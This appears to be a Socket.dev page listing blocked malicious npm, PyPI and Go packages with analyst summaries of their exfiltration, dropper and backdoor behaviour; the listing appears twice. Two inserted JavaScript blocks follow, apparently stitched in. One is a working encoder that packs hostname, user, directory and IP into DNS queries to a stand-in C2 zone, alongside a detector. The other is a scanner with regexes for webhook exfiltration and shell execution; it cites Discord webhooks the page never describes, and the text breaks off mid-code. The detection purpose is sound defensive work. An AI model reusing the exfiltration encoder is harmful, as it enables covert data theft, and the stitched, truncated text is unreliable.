
Secure your dependencies. Ship with confidence.

Socket is a developer-first security platform that protects your code from both vulnerable and malicious dependencies.


Find and compare millions of open source packages

Quickly evaluate the security and health of any open source package.

jquery: timmywil published 4.0.0
left-pad: stevemao published 1.3.0
react: react-bot published 19.2.4

We protect you from vulnerable and malicious packages

@synsci/cli-darwin-x64-baseline 1.1.92, by syntheticsciences. Live on npm. Blocked by Socket.

[Skill Scanner] Installation of third-party script detected (AITech 9.1.4) [SC006]

fc-transactions-service 9999.9999.99999, by thiezn. Removed from npm. Blocked by Socket.

This code is intentionally malicious and captures sensitive information. It sends this data to external URLs, indicating a supply chain attack. The message printed to the console suggests that this is intentional. The code poses a significant security risk and should not be used.

Live on npm for 4 minutes before removal. Socket users were protected even while the package was live.

azure-graphrbac 0.7.9. Removed from npm. Blocked by Socket.

The code is highly suspicious due to its collection and exfiltration of sensitive information (system paths, user info, and package metadata) to external URLs. The use of hardcoded URLs, especially to non-reputable domains, and the infinite loop for data exfiltration suggest potential malicious intent.

Live on npm for 8 minutes before removal. Socket users were protected even while the package was live.

@synsci/cli-linux-x64-baseline-musl 1.1.80, by syntheticsciences. Live on npm. Blocked by Socket.

[Skill Scanner] Installation of third-party script detected (AITech 9.1.4) [SC006]

axios-replace 1.0.0. Removed from npm. Blocked by Socket.

The code provided exhibits significant obfuscation and suspicious patterns, such as the use of eval and complex string manipulations, which are typical indicators of potentially malicious behavior. Without further deobfuscation, it is not possible to definitively determine the intent, but it is highly concerning and warrants caution.

Live on npm for 52 minutes before removal. Socket users were protected even while the package was live.

@emerald-react/menu 999.999.999, by cbrepoc. Live on npm. Blocked by Socket.

This code performs covert data-leakage/beaconing: it collects local environment identifiers, constructs a DNS name embedding them, resolves that name against a hardcoded external domain, and then exits. The obfuscation and evasive module loading strongly indicate intent to hide behavior. Treat this module as malicious/untrusted until maintainers provide a convincing, documented justification for this exact behavior. Immediate recommended actions: do not install/run the package, investigate any systems where it executed, and block DNS queries to the specified domain(s).

elf-stats-wintry-ornament-960 1.0.0, by helphy. Live on npm. Blocked by Socket.

This package will execute index.js automatically during installation. That gives the package the ability to perform potentially harmful or unwanted actions (data exfiltration, telemetry, modifying the filesystem, running arbitrary commands). You must inspect the contents of index.js before installing or avoid installing packages that run arbitrary scripts during install.

github.com/bishopfox/sliver v1.5.40-0.20230803235709-59212f06fd5d. Live on Go Modules. Blocked by Socket.

This source file implements a network pivot/listener component of the Sliver implant framework, enabling encrypted peer-to-peer pivoting and forwarding of protobuf-based C2 envelopes. Behavior is consistent with a remote control implant component and therefore presents high security risk in most benign deployment contexts (it is explicitly an implant/C2 artifact). The code itself does not show obfuscation or obvious credential harvesting beyond normal C2 functionality, but it forwards potentially arbitrary data upstream and downstream which can be used for command-and-control and data exfiltration. Use of this code in a project should be considered malicious unless the package is intentionally used in an offensive security context with appropriate authorization.

@ngxtm/devkit 3.10.3, by ngxtm. Live on npm. Blocked by Socket.

[Skill Scanner] Instruction to copy/paste content into terminal detected
All findings:
[CRITICAL] command_injection: Instruction to copy/paste content into terminal detected (CI012) [AITech 9.1.4]
[HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3]
[HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3]
[HIGH] command_injection: PowerShell execution detected (CI005) [AITech 9.1.4]
This skill is an explicit offensive-operations playbook for Windows privilege escalation. The capabilities and commands accurately implement the stated purpose (privilege escalation), but they are high-risk and directly enable credential theft, remote command execution, and system compromise. While legitimate for authorized pentesting, the content is dangerous if used maliciously and encourages evasion techniques. Treat as malicious/offensive guidance in untrusted contexts and restrict distribution and execution to authorized security engagements.
LLM verification: This skill is offensive by design: it provides explicit, actionable steps and commands to perform Windows privilege escalation (credential dumping, service hijacking, reverse shells, etc.). The capabilities match the stated purpose, so it is internally consistent, but the content is high-risk and easily abused. For supply-chain assessment: the document itself is not obfuscated and does not contain embedded malware binaries, but it prescribes using powerful dual-use tools and network exfiltration

gs-peer-connection 0.0.31.35. Live on PyPI. Blocked by Socket.

This module contains explicit remote code execution behavior: it runs shell commands received over a datachannel and returns their output. It also exposes session/signature tokens in the signaling connect URL and streams local webcam data. These behaviors together constitute a remote backdoor and serious privacy/security risk. Unless this is intended and protected by out-of-band authorization, the code should be considered malicious/backdoor-capable and not safe to include unreviewed in production.

windowsrequir 1.0.2. Live on PyPI. Blocked by Socket.

The file constructs an obfuscated PowerShell command by joining split string fragments, then calls subprocess.run(shell=True) to execute it. The command uses Invoke-WebRequest to fetch 'http://stellar-conquest[.]fr/launcher[.]bat' over HTTP to %TEMP%\launcher.bat, and then Start-Process with -ExecutionPolicy Bypass and -WindowStyle Hidden to run that batch file. The combination of string fragmentation (evasion), insecure transport, policy bypass, hidden window execution, and lack of any integrity or authenticity verification makes this a high-risk remote-code-execution dropper.

@builder.io/sdk-react-nextjs 0.24.1, by GitHub Actions. Live on npm. Blocked by Socket.

The code actively embeds user-provided content and executes inline scripts while dynamically loading external scripts. This pattern poses a significant security risk if m.content can be influenced by untrusted sources. Although the component tracks previously seen scripts to avoid re-execution, the lack of sanitization and CSP hardening makes it susceptible to XSS and remote code execution. In a supply chain context, this is unacceptable unless inputs are strictly trusted and isolation is guaranteed. Recommend removing inline script execution, avoiding dangerous innerHTML, implementing strict content sanitization, and applying a strict Content-Security-Policy plus sandboxed execution if script execution is required.

agentfoundry 1.3.6. Live on PyPI. Blocked by Socket.

This function is a high-risk primitive: it performs filesystem access and arbitrary SQL execution based entirely on untrusted input. While not obviously malicious (no obfuscated payloads, no hardcoded secrets, no network exfiltration code), its design enables data exfiltration and destructive operations when reachable by untrusted callers (for example, if registered as a LangChain Tool exposed to model prompts). Mitigations: restrict tool exposure to trusted callers, implement allowlists for allowed database file paths, validate or parameterize queries (or only allow predefined named queries), remove or sanitize error messages, use context managers to ensure connection closure, and disable unsafe SQLite features (LOAD_EXTENSION). Do not register this tool with agents that can be driven by untrusted input without applying strict controls.

meshcentral 0.2.7-w, by ysainthilaire. Live on npm. Blocked by Socket.

The code fragment exhibits high-risk patterns: a broad AMT tooling surface combined with a WebSocket relay proxy that can forward to arbitrary destinations, plus a large opaque payload and insecure TLS handling. This strongly indicates potential malicious activity or backdoor-like capabilities if deployed as part of a library. Recommend treating as suspicious, performing thorough audit, removing the TLS verification bypass, constraining allowed destinations, enforcing authentication, and isolating any embedded payload with a verifiable origin. In a supply-chain context, this warrants at least a medium-high security risk assessment and caution in adoption.

airpilot 0.8.8, by shaneholloman. Removed from npm. Blocked by Socket.

Most of the code is legitimate SDK and protocol handling used by AWS and Google client libraries. However, the presence of a function (named updatePackage in module 40766) that downloads an npm tarball, injects local code (process.argv[1]) into the package, repacks it, and runs npm publish is a clear supply-chain risk and strongly suspicious. That function provides a mechanism to inject and publish arbitrary code into existing packages and should be considered malicious or at least severely dangerous in the context of a trusted dependency. Apart from that function, the other modules perform expected SDK operations (credential providers, request signing, proto loading). Recommend immediately auditing who authored/added the updatePackage code, removing or isolating it, and scanning package history for commits introducing such behavior. If you consume this bundle, avoid executing the updatePackage workflow and do not run npm publish flows originating from this code. Rotate any potentially exposed credentials and audit your registry activity.

Live on npm for 3 hours and 56 minutes before removal. Socket users were protected even while the package was live.

zqdl222 22.2.2, by zqdl123. Removed from npm. Blocked by Socket.

The script sends potentially sensitive information about the system to an external server, which poses a significant security risk and is indicative of malicious behavior.

Live on npm for 11 days, 18 hours and 11 minutes before removal. Socket users were protected even while the package was live.

cyber-fca 2.0.1, by cyber-ullash. Live on npm. Blocked by Socket.

This module is highly obfuscated and uses eval on a large embedded encoded payload to reconstruct runtime identifiers and behavior. It sets up MQTT subscriptions and publishes, builds and calls remote URLs (likely HTTP requests), parses untrusted JSON from MQTT messages, and executes handlers that can cause further network requests. While I see no explicit filesystem destruction, shell spawning, or direct credential harvesting in the visible code, the use of eval and heavy obfuscation is a strong supply-chain risk: it conceals intent and may execute arbitrary behavior delivered in the encoded blob or via remote commands. I recommend treating this package as suspicious: do not run it in production until fully deobfuscated and audited. If present in a dependency tree, remove or isolate and perform a full dynamic analysis in a safe environment.

osism 0.20251110.0. Live on PyPI. Blocked by Socket.

This script performs bulk, unconditional deletion of many Ansible collection directories under the specified ANSIBLE_COLLECTIONS_PATH. It does not read external input (other than the hardcoded path variable) and does not perform network activity, but it is destructive and can effectively sabotage environments that rely on those collections. Use is dangerous — do not run unless you intentionally want to remove those exact directories and have backups. Recommend blocking or requiring manual review and safeguards (confirmation, dry-run, path validation) before execution.

jazz-ai 0.9.8, by GitHub Actions. Live on npm. Blocked by Socket.

[Skill Scanner] Installation of third-party script detected
All findings:
[CRITICAL] command_injection: Installation of third-party script detected (SC006) [AITech 9.1.4]
[HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3]
[HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3]
[HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3]
The skill's declared purpose (browser automation, scraping, form filling, screenshots, and optional cloud-hosted sessions) is coherent with most capabilities. However, some capabilities (exporting/syncing cookies and Chrome profiles to cloud, `--browser real` accessing local profiles, and persistent execution of arbitrary Python) are high-privilege and can expose credentials/session tokens. The documentation partially mitigates this by recommending domain-restricted sync and explicit prompts, but it omits exact network endpoints and whether API keys/data are proxied. Because of those high-impact data flows (cookies/profiles -> cloud) and the potential for arbitrary code execution in the Python session, the package should be treated with caution: review the implementation to confirm where network requests go and that syncing requires explicit user consent and fine-grained controls. There is no clear sign of intentional malware in the provided text, but the feature set enables credential-exfiltration if mis-implemented or abused.
LLM verification: The document describes a powerful browser automation CLI with legitimate uses but with multiple high-impact data-exposure capabilities: access to real browser profiles, cookie export/import, arbitrary JS evaluation, persistent Python execution, and remote cloud execution. The README shows no direct indicators of malware, hard-coded backdoors, or obfuscation in behavior, but the described features create significant opportunities for credential theft or data exfiltration if misused, implemented i

pinokiod 3.2.145, by cocktailpeanut. Live on npm. Blocked by Socket.

The SweetAlert2 library code is mostly benign and serves as a UI modal dialog tool. However, it contains a suspicious and potentially malicious snippet that targets Russian users on certain domains to play an unsolicited audio prank, disabling pointer events and potentially disrupting user interaction. This behavior is unexpected and should be considered a moderate security risk and potential malware. The rest of the code shows no signs of malicious intent. The provided reports were invalid and unhelpful. Users should be cautious about this version of the library due to the embedded prank behavior.

clientcore-onesrv-serviceclients 99.99.9, by confusion-test3. Removed from npm. Blocked by Socket.

The script gathers data about the user's system, including package name, current working directory, username, hostname, and IP address. This data is then encoded and sent as DNS queries to a remote server.

Live on npm for 6 minutes before removal. Socket users were protected even while the package was live.

airbnb-location-suggester 7.7.0, by jpdhackerone06. Removed from npm. Blocked by Socket.

This package runs arbitrary local code during installation (node index.js). That behavior is inherently risky: index.js could perform telemetry, exfiltrate secrets, install backdoors, modify the repository, or spawn remote shells. Before installing, inspect the contents of index.js and any files it loads; prefer installing only from trusted packages or run installation in an isolated environment. The declared dependencies (axios, node-fetch, ws) increase the potential for network-based malicious behavior but are not themselves flagged as non-registry sources.

Live on npm for 14 hours and 48 minutes before removal. Socket users were protected even while the package was live.

github.com/typenameman/rosy-go v0.0.0-20220106011716-b738fea76657. Live on Go Modules. Blocked by Socket.

The code exhibits clear malicious-and-suspicious behavior: credential harvesting, insecure cryptography, exfiltration of local assets, and automated interaction with protected endpoints on an attacker-controlled domain. In a supply-chain context, inclusion of this module would create severe security risks, including unauthorized data access and data leakage. This code should be treated as dangerous, blocked, and subjected to thorough review and remediation (remove hardcoded secrets, implement secure cryptography with randomized IVs, strengthen error handling, and prevent exfiltration of local files).

@synsci/cli-windows-x64-baseline 1.1.88, by syntheticsciences. Live on npm. Blocked by Socket.

[Skill Scanner] Installation of third-party script detected (AITech 9.1.4) [SC006]

klu-web-ui 0.0.50, by jorgediazklu. Live on npm. Blocked by Socket.

The code is highly suspicious and potentially malicious. It fetches and executes remote HTML content from a suspicious domain without sanitization, exposing users to XSS and malware injection risks. This behavior is indicative of a supply chain security incident and should be treated as high risk. The component should be removed or thoroughly audited before use.

@synsci/cli-darwin-x64-baseline

1.1.92

by syntheticsciences

Live on npm

Blocked by Socket

[Skill Scanner] Installation of third-party script detected (AITech 9.1.4) [SC006]

fc-transactions-service

9999.9999.99999

by thiezn

Removed from npm

Blocked by Socket

This code is intentionally malicious and captures sensitive information. It sends this data to external URLs, indicating a supply chain attack. The message printed to the console suggests that this is intentional. The code poses a significant security risk and should not be used.

Live on npm for 4 minutes before removal. Socket users were protected even while the package was live.

azure-graphrbac

0.7.9

Removed from npm

Blocked by Socket

The code is highly suspicious due to its collection and exfiltration of sensitive information (system paths, user info, and package metadata) to external URLs. The use of hardcoded URLs, especially to non-reputable domains, and the infinite loop for data exfiltration suggest potential malicious intent.

Live on npm for 8 minutes before removal. Socket users were protected even while the package was live.

@synsci/cli-linux-x64-baseline-musl

1.1.80

by syntheticsciences

Live on npm

Blocked by Socket

[Skill Scanner] Installation of third-party script detected (AITech 9.1.4) [SC006]

axios-replace

1.0.0

Removed from npm

Blocked by Socket

The code provided exhibits significant obfuscation and suspicious patterns, such as the use of eval and complex string manipulations, which are typical indicators of potentially malicious behavior. Without further deobfuscation, it is not possible to definitively determine the intent, but it is highly concerning and warrants caution.

Live on npm for 52 minutes before removal. Socket users were protected even while the package was live.

@emerald-react/menu

999.999.999

by cbrepoc

Live on npm

Blocked by Socket

This code performs covert data-leakage/beaconing: it collects local environment identifiers, constructs a DNS name embedding them, resolves that name against a hardcoded external domain, and then exits. The obfuscation and evasive module loading strongly indicate intent to hide behavior. Treat this module as malicious/untrusted until maintainers provide a convincing, documented justification for this exact behavior. Immediate recommended actions: do not install/run the package, investigate any systems where it executed, and block DNS queries to the specified domain(s).

elf-stats-wintry-ornament-960

1.0.0

by helphy

Live on npm

Blocked by Socket

This package will execute index.js automatically during installation. That gives the package the ability to perform potentially harmful or unwanted actions (data exfiltration, telemetry, modifying the filesystem, running arbitrary commands). You must inspect the contents of index.js before installing or avoid installing packages that run arbitrary scripts during install.

github.com/bishopfox/sliver

v1.5.40-0.20230803235709-59212f06fd5d

Live on Go Modules

Blocked by Socket

This source file implements a network pivot/listener component of the Sliver implant framework, enabling encrypted peer-to-peer pivoting and forwarding of protobuf-based C2 envelopes. Behavior is consistent with a remote control implant component and therefore presents high security risk in most benign deployment contexts (it is explicitly an implant/C2 artifact). The code itself does not show obfuscation or obvious credential harvesting beyond normal C2 functionality, but it forwards potentially arbitrary data upstream and downstream which can be used for command-and-control and data exfiltration. Use of this code in a project should be considered malicious unless the package is intentionally used in an offensive security context with appropriate authorization.

@ngxtm/devkit

3.10.3

by ngxtm

Live on npm

Blocked by Socket

[Skill Scanner] Instruction to copy/paste content into terminal detected All findings: [CRITICAL] command_injection: Instruction to copy/paste content into terminal detected (CI012) [AITech 9.1.4] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] [HIGH] command_injection: PowerShell execution detected (CI005) [AITech 9.1.4] This skill is an explicit offensive-operations playbook for Windows privilege escalation. The capabilities and commands accurately implement the stated purpose (privilege escalation), but they are high-risk and directly enable credential theft, remote command execution, and system compromise. While legitimate for authorized pentesting, the content is dangerous if used maliciously and encourages evasion techniques. Treat as malicious/offensive guidance in untrusted contexts and restrict distribution and execution to authorized security engagements. LLM verification: This skill is offensive by design: it provides explicit, actionable steps and commands to perform Windows privilege escalation (credential dumping, service hijacking, reverse shells, etc.). The capabilities match the stated purpose, so it is internally consistent, but the content is high-risk and easily abused. For supply-chain assessment: the document itself is not obfuscated and does not contain embedded malware binaries, but it prescribes using powerful dual-use tools and network exfiltration

gs-peer-connection

0.0.31.35

Live on PyPI

Blocked by Socket

This module contains explicit remote code execution behavior: it runs shell commands received over a datachannel and returns their output. It also exposes session/signature tokens in the signaling connect URL and streams local webcam data. These behaviors together constitute a remote backdoor and serious privacy/security risk. Unless this is intended and protected by out-of-band authorization, the code should be considered malicious/backdoor-capable and not safe to include unreviewed in production.

windowsrequir

1.0.2

Live on PyPI

Blocked by Socket

The file constructs an obfuscated PowerShell command by joining split string fragments, then calls subprocess.run(shell=True) to execute it. The command uses Invoke-WebRequest to fetch 'http://stellar-conquest[.]fr/launcher[.]bat' over HTTP to %TEMP%\launcher.bat, and then Start-Process with -ExecutionPolicy Bypass and -WindowStyle Hidden to run that batch file. The combination of string fragmentation (evasion), insecure transport, policy bypass, hidden window execution, and lack of any integrity or authenticity verification makes this a high-risk remote-code-execution dropper.

@builder.io/sdk-react-nextjs

0.24.1

by GitHub Actions

Live on npm

Blocked by Socket

The code actively embeds user-provided content and executes inline scripts while dynamically loading external scripts. This pattern poses a significant security risk if m.content can be influenced by untrusted sources. Although the component tracks previously seen scripts to avoid re-execution, the lack of sanitization and CSP hardening makes it susceptible to XSS and remote code execution. In a supply chain context, this is unacceptable unless inputs are strictly trusted and isolation is guaranteed. Recommend removing inline script execution, avoiding dangerous innerHTML, implementing strict content sanitization, and applying a strict Content-Security-Policy plus sandboxed execution if script execution is required.

agentfoundry

1.3.6

Live on PyPI

Blocked by Socket

This function is a high-risk primitive: it performs filesystem access and arbitrary SQL execution based entirely on untrusted input. While not obviously malicious (no obfuscated payloads, no hardcoded secrets, no network exfiltration code), its design enables data exfiltration and destructive operations when reachable by untrusted callers (for example, if registered as a LangChain Tool exposed to model prompts). Mitigations: restrict tool exposure to trusted callers, implement allowlists for allowed database file paths, validate or parameterize queries (or only allow predefined named queries), remove or sanitize error messages, use context managers to ensure connection closure, and disable unsafe SQLite features (LOAD_EXTENSION). Do not register this tool with agents that can be driven by untrusted input without applying strict controls.

meshcentral

0.2.7-w

by ysainthilaire

Live on npm

Blocked by Socket

The code fragment exhibits high-risk patterns: a broad AMT tooling surface combined with a WebSocket relay proxy that can forward to arbitrary destinations, plus a large opaque payload and insecure TLS handling. This strongly indicates potential malicious activity or backdoor-like capabilities if deployed as part of a library. Recommend treating as suspicious, performing thorough audit, removing the TLS verification bypass, constraining allowed destinations, enforcing authentication, and isolating any embedded payload with a verifiable origin. In a supply-chain context, this warrants at least a medium-high security risk assessment and caution in adoption.

airpilot

0.8.8

by shaneholloman

Removed from npm

Blocked by Socket

Most of the code is legitimate SDK and protocol handling used by AWS and Google client libraries. However, the presence of a function (named updatePackage in module 40766) that downloads an npm tarball, injects local code (process.argv[1]) into the package, repacks it, and runs npm publish is a clear supply-chain risk and strongly suspicious. That function provides a mechanism to inject and publish arbitrary code into existing packages and should be considered malicious or at least severely dangerous in the context of a trusted dependency. Apart from that function, the other modules perform expected SDK operations (credential providers, request signing, proto loading). Recommend immediately auditing who authored/added the updatePackage code, removing or isolating it, and scanning package history for commits introducing such behavior. If you consume this bundle, avoid executing the updatePackage workflow and do not run npm publish flows originating from this code. Rotate any potentially exposed credentials and audit your registry activity.

Live on npm for 3 hours and 56 minutes before removal. Socket users were protected even while the package was live.

zqdl222

22.2.2

by zqdl123

Removed from npm

Blocked by Socket

The script sends potentially sensitive information about the system to an external server, which poses a significant security risk and is indicative of malicious behavior.

Live on npm for 11 days, 18 hours and 11 minutes before removal. Socket users were protected even while the package was live.

cyber-fca

2.0.1

by cyber-ullash

Live on npm

Blocked by Socket

This module is highly obfuscated and uses eval on a large embedded encoded payload to reconstruct runtime identifiers and behavior. It sets up MQTT subscriptions and publishes, builds and calls remote URLs (likely HTTP requests), parses untrusted JSON from MQTT messages, and executes handlers that can cause further network requests. While I see no explicit filesystem destruction, shell spawning, or direct credential harvesting in the visible code, the use of eval and heavy obfuscation is a strong supply-chain risk: it conceals intent and may execute arbitrary behavior delivered in the encoded blob or via remote commands. I recommend treating this package as suspicious: do not run it in production until fully deobfuscated and audited. If present in a dependency tree, remove or isolate and perform a full dynamic analysis in a safe environment.

osism

0.20251110.0

Live on PyPI

Blocked by Socket

This script performs bulk, unconditional deletion of many Ansible collection directories under the specified ANSIBLE_COLLECTIONS_PATH. It does not read external input (other than the hardcoded path variable) and does not perform network activity, but it is destructive and can effectively sabotage environments that rely on those collections. Use is dangerous — do not run unless you intentionally want to remove those exact directories and have backups. Recommend blocking or requiring manual review and safe-guards (confirmation, dry-run, path validation) before execution.

jazz-ai

0.9.8

by GitHub Actions

Live on npm

Blocked by Socket

[Skill Scanner] Installation of third-party script detected All findings: [CRITICAL] command_injection: Installation of third-party script detected (SC006) [AITech 9.1.4] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] The skill's declared purpose (browser automation, scraping, form filling, screenshots, and optional cloud-hosted sessions) is coherent with most capabilities. However, some capabilities (exporting/syncing cookies and Chrome profiles to cloud, `--browser real` accessing local profiles, and persistent execution of arbitrary Python) are high-privilege and can expose credentials/session tokens. The documentation partially mitigates this by recommending domain-restricted sync and explicit prompts, but it omits exact network endpoints and whether API keys/data are proxied. Because of those high-impact data flows (cookies/ profiles -> cloud) and the potential for arbitrary code execution in the Python session, the package should be treated with caution: review the implementation to confirm where network requests go and that syncing requires explicit user consent and fine-grained controls. There is no clear sign of intentional malware in the provided text, but the feature set enables credential-exfiltration if mis-implemented or abused. LLM verification: The document describes a powerful browser automation CLI with legitimate uses but with multiple high-impact data-exposure capabilities: access to real browser profiles, cookie export/import, arbitrary JS evaluation, persistent Python execution, and remote cloud execution. The README shows no direct indicators of malware, hard-coded backdoors, or obfuscation in behavior, but the described features create significant opportunities for credential theft or data exfiltration if misused, implemented i

pinokiod

3.2.145

by cocktailpeanut

Live on npm

Blocked by Socket

The SweetAlert2 library code is mostly benign and serves as a UI modal dialog tool. However, it contains a suspicious and potentially malicious snippet that targets Russian users on certain domains to play an unsolicited audio prank, disabling pointer events and potentially disrupting user interaction. This behavior is unexpected and should be considered a moderate security risk and potential malware. The rest of the code shows no signs of malicious intent. The provided reports were invalid and unhelpful. Users should be cautious about this version of the library due to the embedded prank behavior.

clientcore-onesrv-serviceclients

99.99.9

by confusion-test3

Removed from npm

Blocked by Socket

The script gathers data about the user's system, including package name, current working directory, username, hostname, and IP address. This data is then encoded and sent as DNS queries to a remote server.

Live on npm for 6 minutes before removal. Socket users were protected even while the package was live.
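The entry above describes the DNS-tunnelling pattern in one sentence: host details are encoded into query labels under an attacker-controlled zone. The following is an added example, not code from the flagged package or from Socket. It shows both halves of that exchange (the sender-side encoding into hex labels with a sequence prefix, and the receiver-side reassembly) and then a detector that runs over resolver query logs and flags zones receiving repeated long, encoded-looking subdomains. The log line format, the two-label zone assumption, the payload and every host in the sample are constructed for the demo; a production detector would use a public suffix list instead of "last two labels".

```javascript
// Added example (not the flagged package's code): DNS-label exfil encode/decode
// plus a log-based detector for the pattern. All data below is constructed.

// Sender side: hex-encode the JSON payload, split it into labels, prefix each
// query with a sequence label so the receiver can reorder out-of-order arrivals.
function encodeForDns(payload, zone, labelLen = 50, labelsPerQuery = 2) {
  const hex = Buffer.from(JSON.stringify(payload), 'utf8').toString('hex');
  const labels = [];
  for (let i = 0; i < hex.length; i += labelLen) labels.push(hex.slice(i, i + labelLen));
  const queries = [];
  for (let q = 0; q * labelsPerQuery < labels.length; q++) {
    const chunk = labels.slice(q * labelsPerQuery, (q + 1) * labelsPerQuery);
    queries.push([q, ...chunk, zone].join('.')); // stays well under the 253-char name limit
  }
  return queries;
}

// Receiver side: strip the zone, sort by sequence label, rejoin the hex, parse.
function decodeFromDns(queries, zone) {
  const suffix = '.' + zone;
  const hex = queries
    .map((q) => q.slice(0, -suffix.length).split('.'))
    .sort((a, b) => Number(a[0]) - Number(b[0]))
    .map((labels) => labels.slice(1).join(''))
    .join('');
  return JSON.parse(Buffer.from(hex, 'hex').toString('utf8'));
}

// Shannon entropy in bits per character; reported alongside each flagged zone.
function shannonEntropy(s) {
  const counts = new Map();
  for (const ch of s) counts.set(ch, (counts.get(ch) || 0) + 1);
  let h = 0;
  for (const n of counts.values()) {
    const p = n / s.length;
    h -= p * Math.log2(p);
  }
  return h;
}

// Log format assumed for the demo: "<ts> client=<ip> qname=<name> qtype=<type>".
function parseQname(line) {
  const m = /\bqname=(\S+)/.exec(line);
  return m ? m[1].replace(/\.$/, '').toLowerCase() : null;
}

const ENCODED_LABEL = /^(?:[0-9a-f]+|[a-z2-7]+)$/; // hex or base32 alphabet only

// Flags zones that received at least minQueries queries whose subdomain part is
// long and made entirely of encoded-looking labels. Assumption: two-label zones.
function detectDnsExfil(lines, { minQueries = 2, minSubLen = 40 } = {}) {
  const byZone = new Map();
  for (const line of lines) {
    const name = parseQname(line);
    if (!name) continue;
    const labels = name.split('.');
    if (labels.length < 3) continue; // nothing below the zone apex
    const zone = labels.slice(-2).join('.');
    const sub = labels.slice(0, -2);
    const subStr = sub.join('');
    const suspicious = subStr.length >= minSubLen && sub.every((l) => ENCODED_LABEL.test(l));
    const rec = byZone.get(zone) || { zone, queries: 0, suspicious: 0, encodedChars: 0, maxEntropy: 0 };
    rec.queries += 1;
    if (suspicious) {
      rec.suspicious += 1;
      rec.encodedChars += subStr.length;
      rec.maxEntropy = Math.max(rec.maxEntropy, shannonEntropy(subStr));
    }
    byZone.set(zone, rec);
  }
  return [...byZone.values()].filter((r) => r.suspicious >= minQueries);
}

// Constructed sample: the kind of record the package above would build, a
// constructed C2 zone, and a few benign queries mixed in.
const SAMPLE_PAYLOAD = { host: 'build-agent-07', user: 'ci', cwd: '/home/ci/project', ip: '10.0.0.5', pkg: 'sample-pkg' };
const exfilQueries = encodeForDns(SAMPLE_PAYLOAD, 'c2.example');
const SAMPLE_LOG = [
  '2025-11-23T10:00:01Z client=10.0.0.5 qname=registry.npmjs.org qtype=A',
  '2025-11-23T10:00:02Z client=10.0.0.5 qname=api.github.com qtype=A',
  '2025-11-23T10:00:03Z client=10.0.0.5 qname=d1abc2def3ghi4.cloudfront.net qtype=A',
  ...exfilQueries.map((q, i) => `2025-11-23T10:00:${String(4 + i).padStart(2, '0')}Z client=10.0.0.5 qname=${q} qtype=A`),
];

console.log(detectDnsExfil(SAMPLE_LOG));
```

The detector deliberately keys on structure (repeated, long, alphabet-restricted subdomains to one zone) rather than on any one domain, because the zone is disposable; entropy is reported but not used as the trigger, since hex-encoded ASCII has lower entropy than random bytes and a threshold tuned for the latter would miss it.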

airbnb-location-suggester

7.7.0

by jpdhackerone06

Removed from npm

Blocked by Socket

This package runs arbitrary local code during installation (node index.js). That behavior is inherently risky: index.js could perform telemetry, exfiltrate secrets, install backdoors, modify the repository, or spawn remote shells. Before installing, inspect the contents of index.js and any files it loads; prefer installing only from trusted packages or run installation in an isolated environment. The declared dependencies (axios, node-fetch, ws) increase the potential for network-based malicious behavior but are not themselves flagged as non-registry sources.

Live on npm for 14 hours and 48 minutes before removal. Socket users were protected even while the package was live.
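The verdict above turns on one fact: a lifecycle script runs arbitrary code at install time, and the rest of the risk follows from what that code can reach. The following is an added example, not Socket's scanner and not code from any package on this page. It reviews a package's parsed package.json for install hooks and for dependency specs that resolve outside the registry (git, GitHub shorthand, plain HTTP), then greps the shipped source for the fingerprinting and exfiltration calls that the reconnaissance packages described on this page used (os.hostname/userInfo, dns.getServers, Discord webhook URLs), and combines them into a verdict. The package.json and index.js it scans are constructed for the demo; the indicator list is a starting point, not a complete rule set.

```javascript
// Added example, not Socket's scanner: a heuristic review of an npm package
// for install-time code execution and non-registry dependency sources.
// The package.json and index.js below are constructed for the demo.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Dependency specs that resolve somewhere other than the registry.
const NON_REGISTRY_SPECS = [
  { kind: 'git-dependency', re: /^(?:git\+|git:\/\/|git@)/ },
  { kind: 'github-dependency', re: /^(?:github:|[\w.-]+\/[\w.-]+(?:#[\w.\/-]*)?$)/ },
  { kind: 'http-dependency', re: /^https?:\/\// },
];

// Source-level indicators matching the recon/exfil behaviour described on this page.
const SOURCE_INDICATORS = [
  { kind: 'host-fingerprinting', re: /\bos\.(?:hostname|userInfo|networkInterfaces)\s*\(/ },
  { kind: 'dns-resolver-enumeration', re: /\bdns\.getServers\s*\(/ },
  { kind: 'webhook-exfil', re: /https?:\/\/(?:canary\.)?discord(?:app)?\.com\/api\/webhooks\//i },
  { kind: 'dynamic-code-execution', re: /\b(?:eval|new Function)\s*\(/ },
  { kind: 'shell-execution', re: /\b(?:child_process|execSync|spawnSync)\b/ },
];

// pkg: parsed package.json; files: { relativePath: sourceText } for the tarball's JS.
function scanPackage(pkg, files) {
  const findings = [];
  const scripts = pkg.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    if (scripts[hook]) findings.push({ kind: 'install-script', detail: `${hook}: ${scripts[hook]}` });
  }
  for (const field of ['dependencies', 'devDependencies', 'optionalDependencies']) {
    for (const [name, spec] of Object.entries(pkg[field] || {})) {
      const hit = NON_REGISTRY_SPECS.find((s) => s.re.test(spec));
      if (hit) findings.push({ kind: hit.kind, detail: `${field}: ${name}@${spec}` });
    }
  }
  for (const [path, src] of Object.entries(files)) {
    for (const ind of SOURCE_INDICATORS) {
      if (ind.re.test(src)) findings.push({ kind: ind.kind, detail: path });
    }
  }
  return findings;
}

// An install hook combined with any exec/exfil indicator is what turns a merely
// curious package into one that runs recon on every developer machine and CI runner.
const EXEC_OR_EXFIL = new Set(['webhook-exfil', 'dynamic-code-execution', 'shell-execution',
  'host-fingerprinting', 'dns-resolver-enumeration']);

function riskLevel(findings) {
  const kinds = new Set(findings.map((f) => f.kind));
  if (kinds.has('install-script') && [...kinds].some((k) => EXEC_OR_EXFIL.has(k))) return 'high';
  return kinds.size > 0 ? 'medium' : 'low';
}

// Constructed sample package: postinstall hook, two non-registry deps, recon in index.js.
const SAMPLE_PACKAGE_JSON = {
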